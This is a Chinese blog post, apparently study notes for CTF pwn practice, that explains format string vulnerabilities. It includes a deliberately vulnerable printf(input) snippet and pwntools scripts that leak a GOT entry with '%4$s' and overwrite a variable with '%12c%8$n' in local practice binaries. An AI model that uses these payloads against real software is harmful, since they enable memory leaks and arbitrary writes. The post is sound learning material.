<!DOCTYPE html>
<html lang="zh-CN">
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    <meta name="keywords" content="blog, tech, hexo">
    <meta name="description" content="记录技术与思考">
    <meta name="author" content="zach0ry">
    
    <title>
        
            格式化字符串 |
        
        b1nary
    </title>
    
<link rel="stylesheet" href="/css/style.css">

    
        <link rel="shortcut icon" href="/images/favicon.svg">
    
    
<link rel="stylesheet" href="/font/css/fontawesome.min.css">

    
<link rel="stylesheet" href="/font/css/regular.min.css">

    
<link rel="stylesheet" href="/font/css/solid.min.css">

    
<link rel="stylesheet" href="/font/css/brands.min.css">

    
    <script class="keep-theme-configurations">
    const KEEP = window.KEEP || {}
    KEEP.hexo_config = {"hostname":"zach0ry-zzh.github.io","root":"/","language":"zh-CN","path":"search.json"}
    KEEP.theme_config = {"base_info":{"primary_color":"#10b981","title":"b1nary","author":"zach0ry","avatar":"/images/avatar.jpg","logo":"/images/logo.svg","favicon":"/images/favicon.svg"},"menu":{"home":"/                        || fa-solid fa-home","archives":"/archives            || fa-solid fa-box-archive","tags":"/tags                  || fa-solid fa-tags","categories":"/categories      || fa-solid fa-layer-group"},"first_screen":{"enable":true,"background_img":"/images/bg.svg","background_img_dark":"/images/bg.svg","description":"Keep writing and Keep loving.","hitokoto":true},"social_contact":{"enable":false,"links":{"github":null,"weixin":null,"qq":null,"weibo":null,"zhihu":null,"twitter":null,"x":null,"facebook":null,"email":null}},"scroll":{"progress_bar":false,"percent":true,"hide_header":true},"home":{"announcement":null,"category":true,"tag":true,"post_datetime":"created"},"post":{"author_badge":null,"enable":true,"level_badge":true,"custom_badge":["炼气","筑基","结丹","元婴","化神","渡劫","大乘"],"word_count":{"wordcount":false,"min2read":false},"datetime_format":"YYYY-MM-DD","copyright_info":false,"share":true,"reward":{"enable":false,"img_link":null,"text":null,"icon":null}},"code_block":{"tools":{"enable":true,"style":"default"},"highlight_theme":"obsidian"},"toc":{"enable":true,"number":true,"expand_all":true,"init_open":true,"layout":"right"},"website_count":{"busuanzi_count":{"enable":true,"site_uv":false,"site_pv":false,"page_pv":false}},"local_search":{"enable":true,"preload":true},"search":{"path":"search.json","field":"post","content":true,"format":"striptags"},"comment":{"enable":false,"use":"valine","valine":{"appid":null,"appkey":null,"server_urls":null,"placeholder":null},"gitalk":{"github_id":null,"github_admins":null,"repository":null,"client_id":null,"client_secret":null,"proxy":null},"twikoo":{"env_id":null,"region":null,"version":"1.6.39"},"waline":{"server_url":null,"reaction":false,"version":"3.3.2"},"giscus":{"repo":null,"repo_id":null,"category":"Announcements","category_id":null,"reactions_enabled":false},"artalk":{"server":null},"disqus":{"shortname":null}},"rss":{"enable":false},"lazyload":{"enable":false},"cdn":{"enable":false,"provider":"cdnjs"},"pjax":{"enable":false},"footer":{"since":2020,"word_count":false,"site_deploy":{"enable":false,"provider":"github","url":null},"record":{"enable":false,"list":[{"code":null,"link":null}]}},"inject":{"enable":false,"css":[null],"js":[null]},"root":"","source_data":{},"version":"4.2.5"}
    KEEP.language_ago = {"second":"%s 秒前","minute":"%s 分钟前","hour":"%s 小时前","day":"%s 天前","week":"%s 周前","month":"%s 个月前","year":"%s 年前"}
    KEEP.language_code_block = {"copy":"复制代码","copied":"已复制","fold":"折叠代码块","folded":"已折叠"}
    KEEP.language_copy_copyright = {"copy":"复制版权信息","copied":"已复制","title":"原文标题","author":"原文作者","link":"原文链接"}
  </script>
<meta name="generator" content="Hexo 7.3.0"></head>


<body>
<div class="progress-bar-container">
    

    
</div>



<main class="page-container border-box">
    <!-- home first screen  -->
    

    <!-- page content -->
    <div class="page-main-content border-box">
        <div class="page-main-content-top">
            
<header class="header-wrapper">

    <div class="border-box header-content">
        <div class="left flex-start border-box">
            
                <a class="logo-image border-box" href="/">
                    <img src="/images/logo.svg">
                </a>
            
            <a class="site-name border-box" href="/">
               b1nary
            </a>
        </div>

        <div class="right border-box">
            <div class="pc border-box">
                <ul class="menu-list border-box">
                    
                        
                        <li class="menu-item flex-start border-box">
                            <a class="menu-text-color border-box" href="/">
                                
                                    <i class="menu-text-color menu-icon fa-solid fa-home"></i>
                                
                                首页
                                
                            </a>
                            
                        </li>
                    
                        
                        <li class="menu-item flex-start border-box">
                            <a class="menu-text-color border-box" href="/archives">
                                
                                    <i class="menu-text-color menu-icon fa-solid fa-box-archive"></i>
                                
                                归档
                                
                            </a>
                            
                        </li>
                    
                        
                        <li class="menu-item flex-start border-box">
                            <a class="menu-text-color border-box" href="/tags">
                                
                                    <i class="menu-text-color menu-icon fa-solid fa-tags"></i>
                                
                                标签
                                
                            </a>
                            
                        </li>
                    
                        
                        <li class="menu-item flex-start border-box">
                            <a class="menu-text-color border-box" href="/categories">
                                
                                    <i class="menu-text-color menu-icon fa-solid fa-layer-group"></i>
                                
                                分类
                                
                            </a>
                            
                        </li>
                    
                    
                        <li class="menu-item search search-popup-trigger">
                            <i class="menu-text-color fas search fa-search"></i>
                        </li>
                    
                </ul>
            </div>
            <div class="mobile border-box flex-start">
                
                    <div class="icon-item search search-popup-trigger"><i class="fas fa-search"></i></div>
                
                <div class="icon-item menu-bar">
                    <div class="menu-bar-middle"></div>
                </div>
            </div>
        </div>
    </div>

    <div class="header-drawer">
        <ul class="drawer-menu-list border-box">
            
                
                <li class="drawer-menu-item border-box not-sub-menu">
                    <label class="drawer-menu-label border-box">
                        <a class="drawer-menu-text-color left-side flex-start border-box" href="/">
                            
                                <span class="menu-icon-wrap border-box flex-center">
                                    <i class="drawer-menu-text-color menu-icon fa-solid fa-home"></i>
                                </span>
                            
                            首页
                        </a>
                        
                    </label>
                    
                </li>
            
                
                <li class="drawer-menu-item border-box not-sub-menu">
                    <label class="drawer-menu-label border-box">
                        <a class="drawer-menu-text-color left-side flex-start border-box" href="/archives">
                            
                                <span class="menu-icon-wrap border-box flex-center">
                                    <i class="drawer-menu-text-color menu-icon fa-solid fa-box-archive"></i>
                                </span>
                            
                            归档
                        </a>
                        
                    </label>
                    
                </li>
            
                
                <li class="drawer-menu-item border-box not-sub-menu">
                    <label class="drawer-menu-label border-box">
                        <a class="drawer-menu-text-color left-side flex-start border-box" href="/tags">
                            
                                <span class="menu-icon-wrap border-box flex-center">
                                    <i class="drawer-menu-text-color menu-icon fa-solid fa-tags"></i>
                                </span>
                            
                            标签
                        </a>
                        
                    </label>
                    
                </li>
            
                
                <li class="drawer-menu-item border-box not-sub-menu">
                    <label class="drawer-menu-label border-box">
                        <a class="drawer-menu-text-color left-side flex-start border-box" href="/categories">
                            
                                <span class="menu-icon-wrap border-box flex-center">
                                    <i class="drawer-menu-text-color menu-icon fa-solid fa-layer-group"></i>
                                </span>
                            
                            分类
                        </a>
                        
                    </label>
                    
                </li>
            
        </ul>
    </div>

    <div class="window-mask"></div>

</header>


        </div>

        <div class="page-main-content-middle border-box">

            <div class="main-content border-box">
                

                    
<div class="fade-in-down-animation">
    <div class="post-page-container border-box">
        <div class="post-content-container border-box">
            

            <div class="post-content-bottom border-box">
                
                    <div class="post-title">
                        格式化字符串
                    </div>
                

                
                    <div class="post-header border-box">
                        
                            <div class="avatar-box border-box">
                                <img src="/images/avatar.jpg">
                            </div>
                        
                        <div class="info-box">
                            <div class="author border-box">
                                <span class="name">zach0ry</span>
                                
                            </div>
                            <div class="meta-info border-box">
                                

<div class="post-meta-info-container border-box post">
    <div class="post-meta-info border-box">
        

        
            <span class="meta-info-item post-create-date">
                <i class="icon fa-solid fa-calendar-plus"></i>&nbsp;
                <span class="datetime">2025-07-21</span>
            </span>

            
                <span class="meta-info-item post-update-date">
                    <i class="icon fa-solid fa-file-pen"></i>&nbsp;
                    <span class="datetime" data-updated="Sat Aug 30 2025 19:58:48 GMT+0800">2025-08-30</span>
                </span>
            
        

        
            <span class="meta-info-item post-category border-box"><i class="icon fas fa-folder"></i>&nbsp;
                <ul class="post-category-ul">
                    
                            <li class="category-item"><a href="/categories/pwn-study/">pwn_study</a></li>
                        
                    
                </ul>
            </span>
        

        
            <span class="post-tag meta-info-item border-box">
                <ul class="post-tag-ul">
                    
                            <li class="tag-item"><span class="tag-separator"><i class="icon fas fa-hashtag"></i></span><a href="/tags/PWN/">PWN</a></li>
                        
                    
                            <li class="tag-item"><span class="tag-separator"><i class="icon fas fa-hashtag"></i></span><a href="/tags/%E6%A0%BC%E5%BC%8F%E5%8C%96%E5%AD%97%E7%AC%A6%E4%B8%B2/">格式化字符串</a></li>
                        
                    
                </ul>
            </span>
        

        
        
        
        
    </div>

    
</div>

                            </div>
                        </div>
                    </div>
                

                <div class="post-content keep-markdown-body ">
                    

                    
                         <h2 id="原理"><a href="#原理" class="headerlink" title="原理"></a>原理</h2><p>格式化字符串函数可以接受可变数量的参数，并将第一个参数作为格式化字符串，根据它解析之后的参数。</p>
<p>通俗来说，格式化字符串函数的作用是将计算机内存中的数据转化为人类可读的字符串格式。</p>
<p>一般来说，格式化字符串在利用的时候主要分为三个部分：</p>
<p>(1）格式化字符串函数。</p>
<p>(2）格式化字符串。</p>
<p>(3）后续参数，可选。</p>
<p>用<code>printf(&quot;name:%s,age:%d,salary:%4.2f&quot;,myname,myage, mysalary）</code></p>
<p>printf函数叫作格式化字符串函数，”name:%s,age:%d,salary:%4.2f”叫作格式化字符串，“myname,myage,mysalary”叫作后续参数。</p>
<h3 id="🧱-常见的格式化字符串符号"><a href="#🧱-常见的格式化字符串符号" class="headerlink" title="🧱 常见的格式化字符串符号"></a>🧱 常见的格式化字符串符号</h3><table>
<thead>
<tr>
<th>格式符</th>
<th>作用</th>
<th>示例</th>
<th></th>
</tr>
</thead>
<tbody><tr>
<td><code>%x</code>&#x2F;<code>%p</code></td>
<td>以十六进制形式输出栈上的值</td>
<td><code>%x</code>→<code>0xdeadbeef</code></td>
<td><code>%p</code>通常带<code>0x</code>前缀</td>
</tr>
<tr>
<td><code>%d</code>&#x2F;<code>%u</code></td>
<td>以十进制输出栈上的值</td>
<td><code>%d</code>→<code>3735928559</code></td>
<td></td>
</tr>
<tr>
<td><code>%c</code></td>
<td>输出栈上值的最低一个字节</td>
<td><code>%c</code>→<code>&#39;A&#39;</code></td>
<td></td>
</tr>
<tr>
<td><code>%s</code></td>
<td>把栈上的值当作地址，输出该地址的字符串</td>
<td><code>%s</code>→<code>&quot;Hello&quot;</code></td>
<td></td>
</tr>
<tr>
<td><code>%hn</code></td>
<td>写入 2 字节（short）</td>
<td><code>%hn</code>→ 写入低 2 字节</td>
<td></td>
</tr>
<tr>
<td><code>%hhn</code></td>
<td>写入 1 字节（char）</td>
<td><code>%hhn</code>→ 写入低 1 字节</td>
<td></td>
</tr>
<tr>
<td><code>%n</code></td>
<td>将已输出字符数写入栈上的地址</td>
<td><code>%n</code>→ 写入<code>0x4</code>到指定地址</td>
<td></td>
</tr>
<tr>
<td><code>%$p</code>&#x2F;<code>%%$s</code></td>
<td>指定第几个参数位置的值</td>
<td><code>%4$p</code>→ 第 4 个参数</td>
<td></td>
</tr>
<tr>
<td><code>%%</code></td>
<td>输出一个<code>%</code>字符本身</td>
<td><code>%%</code>→<code>%</code></td>
<td></td>
</tr>
</tbody></table>
<p><img   src="https://cdn.jsdelivr.net/gh/zach0ry-zzh/Inage//test/image-20250721092127879.png"  alt="image-20250721092127879"><img   src="https://cdn.jsdelivr.net/gh/zach0ry-zzh/Inage//test/image-20250721092639513.png"  alt="image-20250721092639513"></p>
<p>当用户控制了 <code>printf()</code> 的第一个参数（即格式化字符串），而程序没有进行过滤或限制，就可能造成以下问题：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">char input[100];</span><br><span class="line">fgets(input, sizeof(input), stdin);</span><br><span class="line">printf(input);  // ⚠️ 危险！用户输入直接作为格式化字符串</span><br></pre></td></tr></table></figure>

<p>此时，攻击者可以构造输入，如：</p>
<p>%x %x %x %x %s</p>
<p>程序会尝试从栈中读取参数，但由于没有提供参数列表，<code>printf()</code> 会继续从栈中“猜测”数据。这可能导致：</p>
<ul>
<li><p>泄露栈内存内容（如返回地址、canary、函数指针等）</p>
</li>
<li><p>写入内存（通过 <code>%n</code> 格式符）</p>
</li>
</ul>
<p>虽然没有写任何参数，但还是会对应地解析参数，因为在格式化字符串中写了对应的解析方式，所以在后续的函数运行中会解析栈上的元</p>
<p>素。对于整型值和浮点值，这没有什么问题，不管栈上是什么数据都能够按照整型值和浮点值解析出来，而字符串形式就不一定能解析出来</p>
<p>了。如果是一个非法地址，比如NULL，那么在解析的时候就会报错，</p>
<p>因为这个地址按照字符串解析是无法解析出来的，程序就会崩溃。这就是格式化字符串漏洞的基本原理</p>
<h2 id="利用"><a href="#利用" class="headerlink" title="利用"></a>利用</h2><h3 id="leakmemory-泄露栈上内容"><a href="#leakmemory-泄露栈上内容" class="headerlink" title="leakmemory(泄露栈上内容)"></a>leakmemory(泄露栈上内容)</h3><p><img   src="https://cdn.jsdelivr.net/gh/zach0ry-zzh/Inage//test/image-20250721102525461.png"  alt="image-20250721102525461"></p>
<p>用了 <code>%100s</code> 来防止缓冲区溢出，但<strong>并没有限制用户输入的格式符内容</strong> 。也就是说：</p>
<ul>
<li><p>用户可以输入 <code>%x</code>、<code>%s</code>、<code>%n</code> 等格式符。</p>
</li>
<li><p><code>printf</code> 会根据这些格式符从栈中“猜测”数据，从而造成信息泄露或任意地址写入。</p>
<p><img   src="https://cdn.jsdelivr.net/gh/zach0ry-zzh/Inage//test/image-20250721102907893.png"  alt="image-20250721102907893"></p>
</li>
</ul>
<h3 id="leakmemory-泄露任意地址内存"><a href="#leakmemory-泄露任意地址内存" class="headerlink" title="leakmemory(泄露任意地址内存)"></a>leakmemory(泄露任意地址内存)</h3><p>这里的目标设立泄露isoc99_scanf函数（scanf编译之后是isoc99_scanf在内存中的地址）。</p>
<p><code>%k$s</code></p>
<p>这里的p是可以更换的，比如更换为s就可以解析栈上的数据为字符串。</p>
<p>k：表示要打印的参数距离目前格式化字符串参数的距离。</p>
<p>因为在没有给printf提供对应的字符，但它是一个<strong>可变参数函数</strong> ，它会从栈上依次读取数据来填充格式化字符串中的 <code>%p</code>、<code>%x</code>、<code>%s</code>、<code>%n</code> 等指令。</p>
<p>但你并不知道你输入的字符串在栈上的具体位置，所以你需要：</p>
<blockquote>
<p><strong>找到你的输入字符串在栈上的偏移量，才能精准控制读写的内容。</strong> </p>
</blockquote>
<p><img   src="https://cdn.jsdelivr.net/gh/zach0ry-zzh/Inage//test/image-20250721145854783.png"  alt="image-20250721145854783"></p>
<p>所以偏移量就是4</p>
<p>所以构造payload &#x3D; p32(scanf_got) + “%4$s”</p>
<p>相当于print(p32(scanf_got) + “%4$s”)</p>
<p>所以前四个字节是输出的scanf的got表</p>
<blockquote>
<p> 🧠 关键区别：<strong>地址 vs 地址的内容</strong></p>
</blockquote>
<table>
<thead>
<tr>
<th></th>
<th></th>
<th></th>
<th></th>
</tr>
</thead>
<tbody><tr>
<td><code>scanf_got</code></td>
<td>GOT 表中<code>scanf</code>的地址（<code>.got</code>段中的一个位置）</td>
<td><code>0x804a008</code></td>
<td>就像书的目录页码</td>
</tr>
<tr>
<td>泄露的地址（<code>leak_addr</code>）</td>
<td>这个 GOT 表项中存储的值（即<code>scanf</code>的实际地址）</td>
<td><code>0xf7e01234</code></td>
<td>就像目录页码指向的那一页的内容</td>
</tr>
</tbody></table>
<h4 id="脚本"><a href="#脚本" class="headerlink" title="脚本"></a>脚本</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">from pwn import *</span><br><span class="line"></span><br><span class="line">p = process(&quot;./leakmemory&quot;)</span><br><span class="line">elf = ELF(&quot;./leakmemory&quot;)</span><br><span class="line">#gdb.attach(p,&quot;b printf&quot;)</span><br><span class="line"></span><br><span class="line">scanf_got = elf.got[&quot;__isoc99_scanf&quot;]</span><br><span class="line">payload=p32(scanf_got)+b&quot;%4$s&quot;</span><br><span class="line">p.sendline(payload)</span><br><span class="line">leak_addr = u32(p.recv(8)[4:])</span><br><span class="line">scanf_addr = leak_addr</span><br><span class="line">log.success(&quot;scanf_addr:&quot; + hex(scanf_addr))</span><br><span class="line">p.interactive()</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p><code>printf</code> 执行流程：</p>
<ol>
<li><code>printf</code> 会从栈上读取参数；</li>
<li>它看到 <code>%4$s</code>，会从第 4 个参数位置读取一个地址；</li>
<li>这个地址是 <code>0x804a018</code>（你写入的 GOT 地址）；</li>
<li>然后从 <code>0x804a018</code> 地址中读出一个指针（比如 <code>0xf7e01234</code>，即 <code>scanf</code> 的运行时地址）；</li>
<li><code>%s</code> 会从 <code>0xf7e01234</code> 开始读取字符串，直到遇到 <code>\0</code>；</li>
<li>最终你接收到的数据中包含 <code>0xf7e01234</code>。</li>
</ol>
<p>📌 总结</p>
<table>
<thead>
<tr>
<th></th>
<th></th>
</tr>
</thead>
<tbody><tr>
<td><code>elf.got[&quot;scanf&quot;]</code>和<code>elf.got[&quot;__isoc99_scanf&quot;]</code>一样吗？</td>
<td>不一定，取决于编译器</td>
</tr>
<tr>
<td>为什么会有<code>__isoc99_scanf</code>？</td>
<td>GCC 编译器为了支持 C99 标准引入的</td>
</tr>
<tr>
<td>怎么确认用哪个？</td>
<td>用<code>readelf -r</code>或<code>objdump -TR</code>查看 GOT 表</td>
</tr>
<tr>
<td>能不能替换？</td>
<td>只有 GOT 表中存在对应符号时才能替换</td>
</tr>
<tr>
<td>如果写错了会怎样？</td>
<td>报错：<code>KeyError</code></td>
</tr>
</tbody></table>
<p><img   src="https://cdn.jsdelivr.net/gh/zach0ry-zzh/Inage//test/image-20250721150514526.png"  alt="image-20250721150514526"></p>
<h4 id="函数调用完整过程"><a href="#函数调用完整过程" class="headerlink" title="函数调用完整过程"></a>函数调用完整过程</h4><p>🌟 阶段 0️⃣：在 <code>vulnfunc</code> 里（调用 printf 之前）</p>
<p>这是已经在 <code>vulnfunc</code> 里，且栈帧已经建立好了。<br> 栈顶在 esp，栈低在高地址方向。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">     ↑ 高地址</span><br><span class="line">──────────────────────────────</span><br><span class="line">| 参数n（可能是命令行参数）       |</span><br><span class="line">| 参数2                        |</span><br><span class="line">| 参数1                        |</span><br><span class="line">──────────────────────────────</span><br><span class="line">| 返回地址 → main              |</span><br><span class="line">──────────────────────────────</span><br><span class="line">| 上一个 ebp                   | ← ebp (vulnfunc 的 ebp)</span><br><span class="line">──────────────────────────────</span><br><span class="line">| vulnfunc 局部变量            |</span><br><span class="line">| …                            | ← esp （在 vulnfunc 里）</span><br><span class="line">      ↓ 低地址</span><br></pre></td></tr></table></figure>

<p>当你刚进入 <code>vulnfunc</code>：</p>
<ul>
<li><p><code>ebp</code> → 上一个 ebp</p>
</li>
<li><p><code>ebp+4</code> → 返回地址（返回到 main）</p>
</li>
<li><p><code>ebp-xx</code> → vulnfunc 的局部变量</p>
</li>
<li><p><code>esp</code> → 最低处，指向局部变量</p>
</li>
</ul>
<p>🌟 阶段 1️⃣：调用 <code>printf(format)</code></p>
<p>当 vulnfunc 调用：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">printf(format);</span><br></pre></td></tr></table></figure>

<p>调用者把返回地址 &amp; 参数压入栈：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">     ↑ 高地址</span><br><span class="line">──────────────────────────────</span><br><span class="line">| 参数n（main 的参数）           |</span><br><span class="line">| …                            |</span><br><span class="line">──────────────────────────────</span><br><span class="line">| 返回地址 → main              |</span><br><span class="line">──────────────────────────────</span><br><span class="line">| 上一个 ebp                   | ← ebp (vulnfunc)</span><br><span class="line">──────────────────────────────</span><br><span class="line">| vulnfunc 局部变量            |</span><br><span class="line">──────────────────────────────</span><br><span class="line">| 参数1=format                 | ← esp+4</span><br><span class="line">| 返回地址 → vulnfunc+下一条   | ← esp</span><br><span class="line">      ↓</span><br></pre></td></tr></table></figure>

<p>此时 esp 指向 <strong>printf 的返回地址</strong>，再往上是 printf 的参数。</p>
<p>🌟 阶段 2️⃣：进入 <code>printf</code> 后</p>
<p>在 printf 开始执行后，它建立自己的栈帧：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">      ↑ 高地址</span><br><span class="line">──────────────────────────────</span><br><span class="line">| 参数n（main 的参数）           |</span><br><span class="line">| …                            |</span><br><span class="line">──────────────────────────────</span><br><span class="line">| 返回地址 → main              |</span><br><span class="line">──────────────────────────────</span><br><span class="line">| 上一个 ebp                   | ← ebp (vulnfunc)</span><br><span class="line">──────────────────────────────</span><br><span class="line">| vulnfunc 局部变量            |</span><br><span class="line">──────────────────────────────</span><br><span class="line">| 参数1=format                 | ← ebp+8</span><br><span class="line">| 返回地址 → vulnfunc+下一条   | ← ebp+4</span><br><span class="line">| 上一个 ebp                   | ← ebp (printf)</span><br><span class="line">──────────────────────────────</span><br><span class="line">| printf 局部变量              | ← esp</span><br><span class="line">      ↓</span><br></pre></td></tr></table></figure>

<p>这里：</p>
<ul>
<li><code>printf</code> 把当前的 ebp 压栈</li>
<li>把 ebp 设置为 esp</li>
<li>esp 再向下留出局部变量空间</li>
</ul>
<p><img   src="https://cdn.jsdelivr.net/gh/zach0ry-zzh/Inage//test/image-20250721144623118.png"  alt="image-20250721144623118"></p>
<p>scanf函数会把读取到的数放在栈上一个空间，然后%p会把它泄露出来</p>
<ol>
<li>使用 <code>scanf</code> 读取一个字符串（最多 100 字节），存入 <code>format</code> 缓冲区；</li>
<li>然后直接将这个字符串作为参数传给 <code>printf</code>，即：<code>printf(format);</code></li>
</ol>
<h3 id="overwrite-覆盖任意地址内存"><a href="#overwrite-覆盖任意地址内存" class="headerlink" title="overwrite(覆盖任意地址内存)"></a>overwrite(覆盖任意地址内存)</h3><p><img   src="https://cdn.jsdelivr.net/gh/zach0ry-zzh/Inage//test/image-20250721153203305.png"  alt="image-20250721153203305"></p>
<p><img   src="https://cdn.jsdelivr.net/gh/zach0ry-zzh/Inage//test/image-20250721153247877.png"  alt="image-20250721153247877"></p>
<p>所以这道题的重点是修改几个数的值</p>
<p>1）将a覆盖为0x10。</p>
<p>2）将b覆盖为2。</p>
<p>3）将c覆盖为0x12345678。</p>
<p>其中a是局部变量，b,c是全局变量</p>
<p>局部变量存储在栈上，全局变量存储在数据段中（分为已初始化rodata和未初始化bss两部分）</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line">+---------------------+ &lt;--- 高内存地址</span><br><span class="line">| 命令行参数 &amp; 环境变量 |</span><br><span class="line">+---------------------+</span><br><span class="line">|       栈 (Stack)    |  &lt;-- 局部变量、函数参数、返回地址</span><br><span class="line">|                     |</span><br><span class="line">|   Function Call N   |</span><br><span class="line">|   (局部变量, 返回地址等)|</span><br><span class="line">|   Function Call 2   |</span><br><span class="line">|   (局部变量, 返回地址等)|</span><br><span class="line">|   Function Call 1   |</span><br><span class="line">|   (局部变量, 返回地址等)|</span><br><span class="line">|        ...          |</span><br><span class="line">|                     |</span><br><span class="line">|        空闲         |</span><br><span class="line">|                     |</span><br><span class="line">+---------------------+</span><br><span class="line">|       堆 (Heap)     |  &lt;-- 动态分配内存 (malloc/new)</span><br><span class="line">|                     |</span><br><span class="line">|        ...          |</span><br><span class="line">+---------------------+</span><br><span class="line">|   .bss 段 (未初始化数据) |  &lt;-- 未初始化的全局变量和静态变量 (例如: b)</span><br><span class="line">+---------------------+</span><br><span class="line">|   .data 段 (已初始化数据) |  &lt;-- 已初始化的全局变量和静态变量 (例如: c)</span><br><span class="line">+---------------------+</span><br><span class="line">|     .text 段 (代码)   |  &lt;-- 程序执行代码 (指令)</span><br><span class="line">+---------------------+</span><br><span class="line">|       保留区域      |</span><br><span class="line">+---------------------+ &lt;--- 低内存地址</span><br></pre></td></tr></table></figure>



<h4 id="a的处理（局部变量）"><a href="#a的处理（局部变量）" class="headerlink" title="a的处理（局部变量）"></a>a的处理（局部变量）</h4><p>首先，a是局部变量，局部变量是存储在栈上的，其地址会因为开启ASLR而变化，所以在函数中将a的地址打印出来了</p>
<h5 id="脚本-1"><a href="#脚本-1" class="headerlink" title="脚本"></a><strong>脚本</strong></h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">from pwn import *</span><br><span class="line">p=process(&quot;./overwrite&quot;)</span><br><span class="line">a=int(p.recvuntil(&#x27;\n&#x27;,drop=True),16)</span><br><span class="line">print(hex(a))</span><br><span class="line">payload=p32(a)+b&quot;%12c&quot;+b&quot;%8$n&quot;</span><br><span class="line">p.sendline(payload)</span><br><span class="line">m=p.recv()</span><br><span class="line">print(m)</span><br></pre></td></tr></table></figure>

<p>int和u32()</p>
<table>
<thead>
<tr>
<th>函数</th>
<th></th>
<th></th>
<th></th>
</tr>
</thead>
<tbody><tr>
<td><code>int(..., 16)</code></td>
<td>接收到的是字符串形式的地址（如<code>&quot;0xffa79dbc&quot;</code>）</td>
<td>转换为整数地址</td>
<td>主动泄露地址</td>
</tr>
<tr>
<td><code>u32(...)</code></td>
<td>接收到的是原始 4 字节数据（如<code>b&#39;\xbc\x9d\xa7\xff&#39;</code>）</td>
<td>将小端序的 4 字节转为整数</td>
<td>调用泄露地址</td>
</tr>
</tbody></table>
<p>🧩 <code>p32(a_addr)</code> 是怎么用的？</p>
<p>构造的 <code>p32(a_addr)</code> 会被 <code>printf</code> 当作一个参数处理：</p>
<ul>
<li>它被压入栈上；</li>
<li><code>%8$n</code> 会从第 8 个参数位置读取它；</li>
<li>这个地址就是写入的目标地址。</li>
</ul>
<p>🧩 <code>%12c</code> 是怎么用的？（目标是16，a的地址占四个字节）</p>
<ul>
<li><code>%12c</code> 输出 12 个字符（如空格）；</li>
<li><code>%n</code> 会把当前输出的字符总数写入指定地址；</li>
<li>所以 <code>%12c</code> 的作用是让 <code>%n</code> 写入 <code>12</code>；</li>
<li>它本身不写入内存，但会影响 <code>%n</code> 的值。</li>
</ul>
<p>不能换成b’a’*12,这个不会影响%n的总数</p>
<p><strong>工作原理：</strong></p>
<ol>
<li>当 <code>printf(payload)</code> 执行时，<code>payload</code> 字符串会被放到栈上。</li>
<li><code>printf</code> 开始解析 <code>payload</code>。它会把 <code>p32(a_addr)</code> 视为一个普通的字符串（但它实际上是 <code>v1</code> 的地址）。</li>
<li>然后遇到 <code>%12c</code>，它输出 12 个字符。</li>
<li>接着遇到 <code>%8$n</code>。此时 <code>printf</code> 已经输出了 12 个字符。它会去栈上寻找第 8 个参数的地址。由于 <code>p32(a_addr)</code> 放在了 payload 的开头，并且其长度是 4 字节，它会正好落在栈上第 8 个参数的位置上（这个偏移量是经过调试确定的）。</li>
<li><code>printf</code> 会将当前已输出的字符数 <code>12</code> <strong>写入</strong>到 <code>p32(a_addr)</code> 所表示的地址，也就是局部变量 <code>v1</code> 的地址。</li>
<li>最终，<code>v1</code> 的值被修改为 <code>12</code>。</li>
</ol>
<h4 id="b的处理（全局小数）"><a href="#b的处理（全局小数）" class="headerlink" title="b的处理（全局小数）"></a>b的处理（全局小数）</h4><p><img   src="https://cdn.jsdelivr.net/gh/zach0ry-zzh/Inage//test/image-20250721202346937.png"  alt="image-20250721202346937"></p>
<p>b,c的地址可以直接找到</p>
